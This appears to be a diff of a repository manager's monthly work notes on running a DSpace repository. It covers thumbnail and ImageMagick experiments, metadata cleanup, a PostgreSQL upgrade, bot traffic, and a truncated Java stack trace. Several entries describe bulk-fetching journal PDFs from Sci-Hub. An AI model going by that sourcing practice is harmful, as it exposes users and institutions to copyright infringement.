-rw-r--r-- 1 aorth aorth 76K Mar 10 12:43 10568-126388-500px.jpg
-rw-r--r-- 1 aorth aorth 106K Mar 10 12:44 10568-126388-600px.jpg
```
- Seems like 600px is 3 to 4 times larger file size, so maybe we should shoot for 400px or 500px
- I decided on 500px
- I started re-generating new thumbnails for the ILRI Publications, CGIAR Initiatives, and other collections
- On that note, I also re-worked the XMLUI item display to show larger thumbnails (from a max-width of 128px to 200px)
- And now that I'm looking at thumbnails I am curious what it would take to get DSpace to generate WebP or AVIF thumbnails
- Peter sent me citations and ILRI subjects for the 350 new ILRI publications
- I guess he edited it in Excel because there are a bunch of encoding issues with accents
- I merged Peter's citations and subjects with the other metadata, ran one last duplicate check (and found one item!), then ran the items through csv-metadata-quality and uploaded them to CGSpace
- In the end it was only 348 items for some reason...
## 2023-03-12
- Start a harvest on AReS
## 2023-03-13
- Extract a list of DOIs from the Creative Commons licensed ILRI journal articles that I uploaded last week, skipping any that are "no derivatives" (ND):
```console
$ csvgrep -c 'dc.description.provenance[en]' -m 'Made available in DSpace on 2023-03-10' /tmp/ilri-articles.csv \
| csvgrep -c 'dcterms.license[en_US]' -r 'CC(0|\-BY)'
| csvgrep -c 'dcterms.license[en_US]' -i -r '\-ND\-'
| csvcut -c 'id,cg.identifier.doi[en_US],dcterms.type[en_US]' > 2023-03-13-journal-articles.csv
```
- I want to write a script to download the PDFs and create thumbnails for them, then upload to CGSpace
- I wrote one based on `post_ciat_pdfs.py` but it seems there is an issue uploading anything other than a PDF
- When I upload a JPG or a PNG the file begins with:
```console
Content-Disposition: form-data; name="file"; filename="10.1017-s0031182013001625.pdf.jpg"
```
- ... this means it is invalid...
- I tried in both the `ORIGINAL` and `THUMBNAIL` bundle, and with different filenames
- I tried manually on the command line with `http` and both PDF and PNG work... hmmmm
- Hmm, this seems to have been due to some difference in behavior between the `files` and `data` parameters of `requests.get()`
- I finalized the `post_bitstreams.py` script and uploaded eighty-five PDF thumbnails
- It seems Bizu uploaded covers for a handful so I deleted them and ran them through the script to get proper thumbnails
## 2023-03-14
- Add twelve IFPRI authors to our controlled vocabulary for authors and ORCID identifiers
- I also tagged their existing items on CGSpace
- Export all our ORCIDs and resolve their names to see if any have changed:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-03-14-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2023-03-14-orcids.txt -o /tmp/2023-03-14-orcids-names.txt -d
```
- Then update them in the database:
```console
$ ./ilri/update_orcids.py -i /tmp/2023-03-14-orcids-names.txt -db dspace -u dspace -p 'fuuu' -m 247
```
## 2023-03-15
- Jawoo was asking about possibilities to harvest PDFs from CGSpace for some kind of AI chatbot integration
- I see we have 45,000 PDFs (format ID 2)
```console
localhost/dspacetest= ☘ SELECT COUNT(*) FROM bitstream WHERE NOT deleted AND bitstream_format_id=2;
count
───────
45281
(1 row)
```
- Rework some of my Python scripts to use a common `db_connect` function from util
- I reworked my `post_bitstreams.py` script to be able to overwrite bitstreams if requested
- The use case is to upload thumbnails for all the journal articles where we have these horrible pixelated journal covers
- I replaced JPEG thumbnails for ~896 ILRI publications by exporting a list of DOIs from the 10568/3 collection that were CC-BY, getting their PDFs from Sci-Hub, and then posting them with my new script
## 2023-03-16
- Continue working on the ILRI publication thumbnails
- There were about sixty-four that had existing PNG "journal cover" thumbnails that didn't get replaced because I only overwrote the JPEG ones yesterday
- Now I generated a list of those bitstream UUIDs and deleted them with a shell script via the REST API
- I made a [pull request on DSpace 7 to update the bitstream format registry for PNG, WebP, and AVIF](https://github.com/DSpace/DSpace/pull/8722)
- Export CGSpace to perform mappings to Initiatives collections
- I also used this export to find CC-BY items with DOIs that had JPEGs or PNGs in their provenance, meaning that the submitter likely submitted a low-quality "journal cover" for the item
- I found about 330 of them and got most of their PDFs from Sci-Hub and replaced the crappy thumbnails with real ones where Sci-Hub had them (~245)
- In related news, I realized you can get an [API key from Elsevier and download the PDFs from their API](https://stackoverflow.com/questions/59202176/python-download-papers-from-sciencedirect-by-doi-with-requests):
```python
import requests
api_key = 'fuuuuuuuuu'
doi = "10.1016/j.foodqual.2021.104362"
request_url = f'https://api.elsevier.com/content/article/doi:{doi}'
headers = {
'X-ELS-APIKEY': api_key,
'Accept': 'application/pdf'
}
with requests.get(request_url, stream=True, headers=headers) as r:
if r.status_code == 200:
with open("article.pdf", "wb") as f:
for chunk in r.iter_content(chunk_size=1024*1024):
f.write(chunk)
```
- The question is, how do we know if a DOI is Elsevier or not...
- CGIAR Repositories Working Group meeting
- We discussed controlled vocabularies for funders
- I suggested checking our combined lists against Crossref and ROR
- Export a list of donors from `cg.contributor.donor` on CGSpace:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=248) to /tmp/2023-03-16-donors.txt;
COPY 1521
```
- Then resolve them against Crossref's funders API:
```console
$ ./ilri/crossref_funders_lookup.py -e fuuuu@cgiar.org -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv -d
$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
472
$ sed 1d ~/Downloads/2023-03-16-cgspace-crossref-funders-results.csv | wc -l
1521
```
- That's a 31% hit rate, but I see some simple things like "Bill and Melinda Gates Foundation" instead of "Bill & Melinda Gates Foundation"
## 2023-03-17
- I did the same lookup of CGSpace donors on ROR's 2022-12-01 data dump:
```console
$ ./ilri/ror_lookup.py -i /tmp/2023-03-16-donors.txt -o ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv -r v1.15-2022-12-01-ror-data.json
$ csvgrep -c matched -m true ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
407
$ sed 1d ~/Downloads/2023-03-16-cgspace-ror-funders-results.csv | wc -l
1521
```
- That's a 26.7% hit rate
- As for the number of funders in each dataset
- Crossref has about 34,000
- ROR has 15,000 if "FundRef" data is a proxy for that:
```console
$ grep -c -rsI FundRef v1.15-2022-12-01-ror-data.json
15162
```
- On a related note, I remembered that DOI.org has a list of DOI prefixes and publishers: https://doi.crossref.org/getPrefixPublisher
- In Python I can look up publishers by prefix easily, here with a nested list comprehension:
```console
In [10]: [publisher for publisher in publishers if '10.3390' in publisher['prefixes']]
Out[10]:
[{'prefixes': ['10.1989', '10.32545', '10.20944', '10.3390', '10.35995'],
'name': 'MDPI AG',
'memberId': 1968}]
```
- And in OpenRefine, if I create a new column based on the DOI using Jython:
```python
import json
with open("/home/aorth/src/git/DSpace/publisher-doi-prefixes.json", "rb") as f:
publishers = json.load(f)
doi_prefix = value.split("/")[3]
publisher = [publisher for publisher in publishers if doi_prefix in publisher['prefixes']]
return publisher[0]['name']
```
- ... though this is very slow and hung OpenRefine when I tried it
- I added the ability to overwrite multiple bitstream formats at once in `post_bitstreams.py`
```console
$ ./ilri/post_bitstreams.py -i test.csv -u https://dspacetest.cgiar.org/rest -e fuuu@example.com -p 'fffnjnjn' -d -s 2B40C7C4E34CEFCF5AFAE4B75A8C52E2 --overwrite JPEG --overwrite PNG -n
Session valid: 2B40C7C4E34CEFCF5AFAE4B75A8C52E2
Opened test.csv
384142cb-58b9-4e64-bcdc-0a8cc34888b3: checking for existing bitstreams in THUMBNAIL bundle
> (DRY RUN) Deleting bitstream: IFPRI Malawi_Maize Market Report_February_202_anonymous.pdf.jpg (16883cb0-1fc8-4786-a04f-32132e0617d4)
> (DRY RUN) Deleting bitstream: AgroEcol_Newsletter_2.png (7e9cd434-45a6-4d55-8d56-4efa89d73813)
> (DRY RUN) Uploading file: 10568-129666.pdf.jpg
```
- I learned how to use Python's built-in `logging` module and it simplifies all my debug and info printing
- I re-factored a few scripts to use the new logging
## 2023-03-18
- I applied changes for publishers on 16,000 items in batches of 5,000
- While working on my `post_bitstreams.py` script I realized the Tomcat Crawler Session Manager valve that groups bot user agents into sessions is causing my login to fail the first time, every time
- I've disabled it for now and will check the Munin session graphs after some time to see if it makes a difference
- In any case I have much better spider user agent lists in DSpace now than I did years ago when I started using the Crawler Session Manager valve
## 2023-03-19
- Start a harvest on AReS
## 2023-03-20
- Minor updates to a few of my DSpace Python scripts to fix the logging
- Minor updates to some records for Mazingira reported by Sonja
- Upgrade PostgreSQL on DSpace Test from version 12 to 14, the same way I did from 10 to 12 last year:
- First, I installed the new version of PostgreSQL via the Ansible playbook scripts
- Then I stopped Tomcat and all PostgreSQL clusters and used `pg_upgrade` to upgrade the old version:
```console
# systemctl stop tomcat7
# pg_ctlcluster 12 main stop
# tar -cvzpf var-lib-postgresql-12.tar.gz /var/lib/postgresql/12
# tar -cvzpf etc-postgresql-12.tar.gz /etc/postgresql/12
# pg_ctlcluster 14 main stop
# pg_dropcluster 14 main
# pg_upgradecluster 12 main
# pg_ctlcluster 14 main start
```
- After that I [re-indexed the database indexes using a query](https://adamj.eu/tech/2021/04/13/reindexing-all-tables-after-upgrading-to-postgresql-13/):
```console
$ su - postgres
$ cat /tmp/generate-reindex.sql
SELECT 'REINDEX TABLE CONCURRENTLY ' || quote_ident(relname) || ' /*' || pg_size_pretty(pg_total_relation_size(C.oid)) || '*/;'
FROM pg_class C
LEFT JOIN pg_namespace N ON (N.oid = C.relnamespace)
WHERE nspname = 'public'
AND C.relkind = 'r'
AND nspname !~ '^pg_toast'
ORDER BY pg_total_relation_size(C.oid) ASC;
$ psql dspace < /tmp/generate-reindex.sql > /tmp/reindex.sql
$ <trim the extra stuff from /tmp/reindex.sql>
$ psql dspace < /tmp/reindex.sql
```
- The index on `metadatavalue` shrunk by 90MB, and others a bit less
- This is nice, but not as drastic as I noticed last year when upgrading to PostgreSQL 12
## 2023-03-21
- Leigh sent me a list of IFPRI authors with ORCID identifiers so I combined them with our list and resolved all their names with `resolve_orcids.py`
- It adds 154 new ORCID identifiers
- I did a follow up to the publisher names from last week using the list from doi.org
- Last week I only updated items with a DOI that had *no* publisher, but now I was curious to see how our existing publisher information compared
- I checked a dozen or so manually and, other than CIFOR/ICRAF and CIAT/Alliance, the metadata was better than our existing data, so I overwrote them
- I spent some time trying to figure out how to get ssimulacra2 running so I could compare thumbnails in JPEG and WebP
- I realized that we can't directly compare JPEG to WebP, we need to convert to JPEG/WebP, then convert each to lossless PNG
- Also, we shouldn't be comparing the resulting images against each other, but rather the original, so I need to a straight PDF to lossless PNG version also
- After playing with WebP at Q82 and Q92, I see it has lower ssimulacra2 scores than JPEG Q92 for the dozen test files
- Could it just be something with ImageMagick?
## 2023-03-22
- I updated csv-metadata-quality to use pandas 2.0.0rc1 and everything seems to work...?
- So the issues with nulls (isna) when I tried the first release candidate a few weeks ago were resolved?
- Meeting with Jawoo and others about a "ChatGPT-like" thing for CGIAR data using CGSpace documents and metadata
## 2023-03-23
- Add a missing IFPRI ORCID identifier to CGSpace and tag his items on CGSpace
- A super unscientific comparison between csv-metadata-quality's pytest regimen using Pandas 1.5.3 and Pandas 2.0.0rc1
- The data was gathered using [rusage](https://justine.lol/rusage), and this is the results of the last of three consecutive runs:
```
# Pandas 1.5.3
RL: took 1,585,999µs wall time
RL: ballooned to 272,380kb in size
RL: needed 2,093,947µs cpu (25% kernel)
RL: caused 55,856 page faults (100% memcpy)
RL: 699 context switches (1% consensual)
RL: performed 0 reads and 16 write i/o operations
# Pandas 2.0.0rc1
RL: took 1,625,718µs wall time
RL: ballooned to 262,116kb in size
RL: needed 2,148,425µs cpu (24% kernel)
RL: caused 63,934 page faults (100% memcpy)
RL: 461 context switches (2% consensual)
RL: performed 0 reads and 16 write i/o operations
```
- So it seems that Pandas 2.0.0rc1 took ten megabytes less RAM... interesting to see that the PyArrow-backed dtypes make a measurable difference even on my small test set
- I should try to compare runs of larger input files
## 2023-03-24
- I added a Flyway SQL migration for the PNG bitstream format registry changes on DSpace 7.6
## 2023-03-26
- There seems to be a slightly high load on CGSpace
- I don't see any locks in PostgreSQL, but there's some new bot I have never heard of:
```console
92.119.18.13 - - [26/Mar/2023:18:41:47 +0200] "GET /handle/10568/16500/discover?filtertype_0=impactarea&filter_relational_operator_0=equals&filter_0=Climate+adaptation+and+mitigation&filtertype=sdg&filter_relational_operator=equals&filter=SDG+11+-+Sustainable+cities+and+communities HTTP/2.0" 200 7856 "-" "colly - https://github.com/gocolly/colly"
```
- In the last week I see a handful of IPs making requests with this agent:
```console
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2,3,4,5,6,7}.gz | grep go
colly | awk '{print $1}' | sort | uniq -c | sort -h
2 194.233.95.37
4304 92.119.18.142
9496 5.180.208.152
27477 92.119.18.13
```
- Most of these come from Packethub S.A. / ASN 62240 (CLOUVIDER Clouvider - Global ASN, GB)
- Oh, I've apparently seen this user agent before, as it is in our ILRI spider user agent overrides
- I exported CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
## 2023-03-27
- The harvest on AReS was incredibly slow and I stopped it about half way twelve hours later
- Then I relied on the plugins to get missing items, which caused a high load on the server but actually worked fine
- Continue working on thumbnails on DSpace
## 2023-03-28
- Regarding ImageMagick there are a few things I've learned
- The `-quality` setting does different things for different output formats, see: https://imagemagick.org/script/command-line-options.php#quality
- The `-compress` setting controls the compression algorithm for image data, and is unrelated to lossless/lossy
- On that note, `-compress lossless` for JPEGs refers to Lossless JPEG, which is not well defined or supported and should be avoided
- See: https://imagemagick.org/script/command-line-options.php#compress
- The way DSpace currently does its supersampling by exporting to a JPEG, then making a thumbnail of the JPEG, is a double lossy operation
- We should be exporting to something lossless like PNG, PPM, or MIFF, then making a thumbnail from that
- The PNG format is always lossless so the `-quality` setting controls compression and filtering, but has no effect on the appearance or signature of PNG images
- You can use `-quality n` with WebP's `-define webp:lossless=true`, but I'm not sure about the interaction between ImageMagick quality and WebP lossless...
- Also, if converting from a lossless format to WebP lossless in the same command, ImageMagick will ignore quality settings
- The MIFF format is useful for piping between ImageMagick commands, but it is also lossless and the quality setting is ignored
- You can use a format specifier when piping between ImageMagick commands without writing a file
- For example, I want to create a lossless PNG from a distorted JPEG for comparison:
```console
$ magick convert reference.jpg -quality 85 jpg:- | convert - distorted-lossless.png
```
- If I convert the JPEG to PNG directly it will ignore the quality setting, so I set the quality and the output format, then pipe it to ImageMagick again to convert to lossless PNG
- In an attempt to quantify the generation loss from DSpace's "JPG JPG" method of creating thumbnails I wrote a script called `generation-loss.sh` to test against a new "PNG JPG" method
- With my sample set of seventeen PDFs from CGSpace I found that _the "JPG JPG" method of thumbnailing results in scores an average of 1.6% lower than with the "PNG JPG" method_.
- The average file size with _the "PNG JPG" method was only 200 bytes larger_.
- In my brief testing, the relationship between ImageMagick's `-quality` setting and WebP's `-define webp:lossless=true` setting are completely unpredictable:
```console
$ magick convert img/10568-103447.pdf.png /tmp/10568-103447.webp
$ magick convert img/10568-103447.pdf.png -define webp:lossless=true /tmp/10568-103447-lossless.webp
$ magick convert img/10568-103447.pdf.png -define webp:lossless=true -quality 50 /tmp/10568-103447-lossless-q50.webp
$ magick convert img/10568-103447.pdf.png -quality 10 -define webp:lossless=true /tmp/10568-103447-lossless-q10.webp
$ magick convert img/10568-103447.pdf.png -quality 90 -define webp:lossless=true /tmp/10568-103447-lossless-q90.webp
$ ls -l /tmp/10568-103447*
-rw-r--r-- 1 aorth aorth 359258 Mar 28 21:16 /tmp/10568-103447-lossless-q10.webp
-rw-r--r-- 1 aorth aorth 303850 Mar 28 21:15 /tmp/10568-103447-lossless-q50.webp
-rw-r--r-- 1 aorth aorth 296832 Mar 28 21:16 /tmp/10568-103447-lossless-q90.webp
-rw-r--r-- 1 aorth aorth 299566 Mar 28 21:13 /tmp/10568-103447-lossless.webp
-rw-r--r-- 1 aorth aorth 190718 Mar 28 21:13 /tmp/10568-103447.webp
```
- I'm curious to see a comparison between the ImageMagick `-define webp:emulate-jpeg-size=true` (aka `-jpeg_like` in cwebp) option compared to normal lossy WebP quality:
```console
$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q -define webp:emulate-jpeg-size=true /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp; done
$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png; done
$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-emulate-jpeg-q${q}.webp.png 2>/dev/null; done
81.29082887
84.42134524
85.84458964
$ for q in 70 80 90; do magick convert img/10568-103447.pdf.png -quality $q /tmp/10568-103447-lossy-q${q}.webp; done
$ for q in 70 80 90; do magick convert /tmp/10568-103447-lossy-q${q}.webp /tmp/10568-103447-lossy-q${q}.webp.png; done
$ for q in 70 80 90; do ssimulacra2 img/10568-103447.pdf.png /tmp/10568-103447-lossy-q${q}.webp.png 2>/dev/null; done
77.25789006
80.79140936
84.79108246
```
- Using `-define webp:method=6` (versus default 4) gets a ~0.5% increase on ssimulacra2 score
## 2023-03-29
- Looking at the `-define webp:near-lossless=$q` option in ImageMagick and I don't think it's working:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:near-lossless=$q -verbose /tmp/10568-103447-near-lossless-q${q}.webp; done
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.090u 0:00.043
data/10568-103447.pdf[0]=>/tmp/10568-103447-near-lossless-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 80440B 0.080u 0:00.043
```
- The file sizes are all the same...
- If I try with `-quality $q` it works:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q -verbose /tmp/10568-103447-q${q}.webp; done
data/10568-103447.pdf[0]=>/tmp/10568-103447-q20.webp PDF 595x842 595x842+0+0 16-bit sRGB 52602B 0.080u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q40.webp PDF 595x842 595x842+0+0 16-bit sRGB 64604B 0.090u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q60.webp PDF 595x842 595x842+0+0 16-bit sRGB 73584B 0.080u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q80.webp PDF 595x842 595x842+0+0 16-bit sRGB 88652B 0.090u 0:00.045
data/10568-103447.pdf[0]=>/tmp/10568-103447-q90.webp PDF 595x842 595x842+0+0 16-bit sRGB 113186B 0.100u 0:00.049
```
- I don't see any issues mentioning this in the ImageMagick GitHub issues, so I guess I have to file a bug
- I first [asked a question on their discussion board](https://github.com/ImageMagick/ImageMagick/discussions/6204) because I see that the near-lossless option should have been added to ImageMagick sometime after 2020 according to another discussion
- Meeting with Maria about the Alliance metadata on CGSpace
- As the Alliance is not a legal entity they want to reflect that somehow in CGSpace
- We discussed updating all metadata, but so many documents issued in the last few years have the Alliance indicated inside them and as affiliations in journal article acknowledgements, etc, we decided it is not the best option
- Instead, we propose to:
- Remove `Alliance of Bioversity International and CIAT` from the controlled vocabulary for affiliations ASAP
- Add `Bioversity International and the International Center for Tropical Agriculture` to the controlled vocabulary for affiliations ASAP
- Add a prominent note to the item page for every item in the Alliance community via a custom XMLUI theme (Maria and the Alliance publishing team to send the text)
## 2023-03-30
- The ImageMagick developers confirmed [my bug report](https://github.com/ImageMagick/ImageMagick/discussions/6204) and created a patch on master
- I'm not entirely sure how it works, but the developer seemed to imply we can use lossless mode plus a quality?
```console
$ magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality 90 /tmp/10568-103447.pdf.webp
```
- Now I see a difference between near-lossless and normal quality mode:
```console
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -define webp:lossless=true -quality $q /tmp/10568-103447-near-lossless-q${q}.webp; done
$ ls -l /tmp/10568-103447-near-lossless-q*
-rw-r--r-- 1 aorth aorth 108186 Mar 30 11:36 /tmp/10568-103447-near-lossless-q20.webp
-rw-r--r-- 1 aorth aorth 97170 Mar 30 11:36 /tmp/10568-103447-near-lossless-q40.webp
-rw-r--r-- 1 aorth aorth 97382 Mar 30 11:36 /tmp/10568-103447-near-lossless-q60.webp
-rw-r--r-- 1 aorth aorth 106090 Mar 30 11:36 /tmp/10568-103447-near-lossless-q80.webp
-rw-r--r-- 1 aorth aorth 105926 Mar 30 11:36 /tmp/10568-103447-near-lossless-q90.webp
$ for q in 20 40 60 80 90; do magick convert -flatten data/10568-103447.pdf\[0\] -quality $q /tmp/10568-103447-q${q}.webp; done
$ ls -l /tmp/10568-103447-q*
-rw-r--r-- 1 aorth aorth 52602 Mar 30 11:37 /tmp/10568-103447-q20.webp
-rw-r--r-- 1 aorth aorth 64604 Mar 30 11:37 /tmp/10568-103447-q40.webp
-rw-r--r-- 1 aorth aorth 73584 Mar 30 11:37 /tmp/10568-103447-q60.webp
-rw-r--r-- 1 aorth aorth 88652 Mar 30 11:37 /tmp/10568-103447-q80.webp
-rw-r--r-- 1 aorth aorth 113186 Mar 30 11:37 /tmp/10568-103447-q90.webp
```
- But after reading the source code in `coders/webp.c` I am not sure I understand, so I asked for clarification in the discussion
- Both Bosede and Abenet said mapping on CGSpace is taking a long time and I don't see any stuck locks so I decided to quickly restart postgresql
## 2023-03-31
- Meeting with Daniel and Naim from Alliance in Cali about CGSpace metadata, TIP, etc
<!-- vim: set sw=2 ts=2: -->

545
content/posts/2023-04.md Normal file
View File

@ -0,0 +1,545 @@
---
title: "April, 2023"
date: 2023-04-02T08:19:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-04-02
- Run all system updates on CGSpace and reboot it
- I exported CGSpace to CSV to check for any missing Initiative collection mappings
- I also did a check for missing country/region mappings with csv-metadata-quality
- Start a harvest on AReS
<!--more-->
- I'm starting to get annoyed at my shell script for doing ImageMagick tests and looking to re-write it in something object oriented like Python
- There doesn't seem to be an official ImageMagick Python binding on pypi.org, perhaps I can use [Wand](https://docs.wand-py.org)?
- Testing Wand in Python:
```python
from wand.image import Image
with Image(filename='data/10568-103447.pdf[0]', resolution=144) as first_page:
print(first_page.height)
```
- I spent more time re-working my thumbnail scripts to compare the resized images and other minor changes
- I am realizing that doing the thumbnails directly from the source improves the ssimulacra2 score by 1-3% points compared to DSpace's method of creating a lossy supersample followed by a lossy resized thumbnail
## 2023-04-03
- The harvest on AReS that I started yesterday never finished, and actually seems to have died...
- Also, Fabio and Patrizio from Alliance emailed me to ask if there is something wrong with the REST API because they are having problems
- I stopped the harvest and started the plugins to get the remaining items via the sitemap...
## 2023-04-04
- Presentation about CGSpace metadata, controlled vocabularies, and curation to Pooja's communications and development team at UNEP
- I uploaded the presentation to CGSpace here: https://hdl.handle.net/10568/129896
- Someone from the system organization contacted me to ask how to download a few thousand PDFs from a spreadsheet with DOIs and Handles
```console
$ csvcut -c Handle ~/Downloads/2023-04-04-Donald.csv \
| sed \
-e 1d \
-e 's_https://hdl.handle.net/__' \
-e 's_https://cgspace.cgiar.org/handle/__' \
-e 's_http://hdl.handle.net/__' \
| sort -u > /tmp/handles.txt
```
- Then I used the `get_dspace_pdfs.py` script to download them
## 2023-04-05
- After some cleanup on Donald's DOIs I started the `get_scihub_pdfs.py` script
## 2023-04-06
- I did some more work to cleanup and streamline my next generation of DSpace thumbnail testing scripts
- I think I found a bug in ImageMagick 7.1.1.5 where CMYK to sRGB conversion fails if we use image operations like `-density` or `-define` before reading the input file
- I started [a discussion on the ImageMagick GitHub](https://github.com/ImageMagick/ImageMagick/discussions/6234) to ask
- Yesterday I started downloading the rest of the PDFs from Donald, those that had DOIs
- As a measure of caution, I extracted the list of DOIs and used my `crossref_doi_lookup.py` script to get their licenses from Crossref:
```console
$ ./ilri/crossref_doi_lookup.py -e xxxx@i.org -i /tmp/dois.txt -o /tmp/donald-crossref-dois.csv -d
```
- Then I did some CSV manipulation to extract the DOIs that were Creative Commons licensed, excluding any that were "No Derivatives", and re-formatting the DOIs:
```console
$ csvcut -c doi,license /tmp/donald-crossref-dois.csv \
| csvgrep -c license -m 'creativecommons' \
| csvgrep -c license -i -r 'by-(nd|nc-nd)' \
| sed -e 's_^10_https://doi.org/10_' \
-e 's/\(am\|tdm\|unspecified\|vor\): //' \
| tee /tmp/donald-open-dois.csv \
| wc -l
4268
```
- From those I filtered for the DOIs for which I had downloaded PDFs, in the `filename` column of the Sci-Hub script and copied them to a separate directory:
```console
$ for file in $(csvjoin -c doi /tmp/donald-doi-pdfs.csv /tmp/donald-open-dois.csv | csvgrep -c filename -i -r '^$' | csvcut -c filename | sed 1d); do cp --reflink=always "$file" "creative-commons-licensed/$file"; done
```
- I used BTRFS copy-on-write via reflinks to make sure I didn't duplicate the files :-D
- I ran out of time and had to stop the process around 3,127 PDFs
- I zipped them up and sent them to the others, along with a CSV of the DOIs, PDF filenames, and licenses
## 2023-04-17
- Abenet noticed a weird issue with [this item](https://cgspace.cgiar.org/handle/10568/75611)
- The item has metadata, but the page is blank
- When I try to edit the item's authorization policies in XMLUI I get a nullPointerException:
```
Java stacktrace: java.lang.NullPointerException
at org.dspace.app.xmlui.aspect.administrative.authorization.EditItemPolicies.addBody(EditItemPolicies.java:166)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:234)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy201.startElement(Unknown Source)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.xml.AbstractXMLPipe.startElement(AbstractXMLPipe.java:94)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:251)
at sun.reflect.GeneratedMethodAccessor347.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy203.startElement(Unknown Source)
at org.apache.cocoon.environment.internal.EnvironmentChanger.startElement(EnvironmentStack.java:140)
at org.apache.cocoon.components.sax.XMLTeePipe.startElement(XMLTeePipe.java:87)
at org.apache.cocoon.components.sax.AbstractXMLByteStreamInterpreter.parse(AbstractXMLByteStreamInterpreter.java:117)
at org.apache.cocoon.components.sax.XMLByteStreamInterpreter.deserialize(XMLByteStreamInterpreter.java:44)
at org.apache.cocoon.components.pipeline.impl.AbstractCachingProcessingPipeline.processXMLPipeline(AbstractCachingProcessingPipeline.java:324)
at org.apache.cocoon.components.pipeline.AbstractProcessingPipeline.process(AbstractProcessingPipeline.java:750)
at sun.reflect.GeneratedMethodAccessor438.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at org.apache.cocoon.core.container.spring.avalon.PoolableProxyHandler.invoke(PoolableProxyHandler.java:71)
at com.sun.proxy.$Proxy191.process(Unknown Source)
at org.apache.cocoon.components.source.impl.SitemapSource.toSAX(SitemapSource.java:362)
at org.apache.cocoon.components.source.util.SourceUtil.toSAX(SourceUtil.java:111)
at org.apache.cocoon.components.source.util.SourceUtil.parse(SourceUtil.java:294)
at org.apache.cocoon.generation.FileGenerator.generate(FileGenerator.java:136)
at sun.reflect.GeneratedMethodAccessor436.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
